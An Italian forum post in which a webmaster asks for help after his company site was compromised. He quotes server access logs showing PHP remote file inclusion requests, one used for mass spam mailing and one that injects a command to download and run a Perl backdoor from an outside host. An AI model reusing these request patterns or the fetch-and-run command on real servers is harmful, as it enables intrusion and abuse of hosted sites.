Innanzitutto non sono sicuro che sia la sezione giusta, ma quella di Apache non la vedo piú, quindi prego eventualmente al moderatore di spostarmi dove ritiene piú opportuno.
Ieri mi ha scritto il responsabile del server dove abbiam il sito dell'azienda riferendomi di due attacchi e della conseguente disattivazione del sito:
il primo ha lanciato uno script per l'invio massivo di email
pubblicitari ad utenti brasiliani (puoi consultare i log del sito
Noria per maggiori dettagli) - ne sono stati inviati con successo
circa 60000 prima d'esser riuscito a bloccare il tutto -:
200.193.225.67 - - [12/Mar/2006:08:00:44 +0100] "GET
/sito/news/index.php?config=1&base_datapath=http://dcorp.newinvest.com.br/list.txt?&chdir=/raid0/web/cnr/guest/noria/ HTTP/1.1" 200
55948
200.193.225.67 - - [12/Mar/2006:08:00:48 +0100] "GET
/sito/news/index.php?config=1&base_datapath=http://dcorp.newinvest.com.br/list.txt?&chdir=/raid0/web/cnr/guest/noria/ HTTP/1.1" 200
23054
200.193.225.67 - - [12/Mar/2006:08:01:08 +0100] "POST
/sito/news/index.php?config=1&base_datapath=http://dcorp.newinvest.com.br/list.txt?&action=upload&chdir=/raid0/web/cnr/guest/noria/ HTTP/1.1" 200La cartella news contiene uno script che io uso per inserire le news, ma anche altre pagine index.php in altre cartelle (faq, gallery) sono state attaccate allo stesso modo.Il secondo ha installato un programma per ottenere accesso interattivo
al server di Area; questo probabilmente finalizzato ad ottenere accesso
privilegiato.
129.22.63.191 - - [12/Mar/2006:13:47:56 +0100] "GET
/sito/news/index.php?config=http://www.agatsuma.kit.net/blabla/vsf.vsf?&cmd=cd%20/tmp;%20wget%20http://www.yasam.ru/VidaLoka/backtool.txt;%20perl%20backtool.txt HTTP/1.1" 200
13778
Ora, quello che vorrei sapere io è questo: è un problema nella configurazione del server oppure mio?
Mi sembra strano che 4-5 script differenti siano tutti suscettibili allo stesso attacco...oltretutto aveva attivato delle restrizioni sul server stesso (il safe_mode) per evitare questo, che mi creavano non pochi problemi.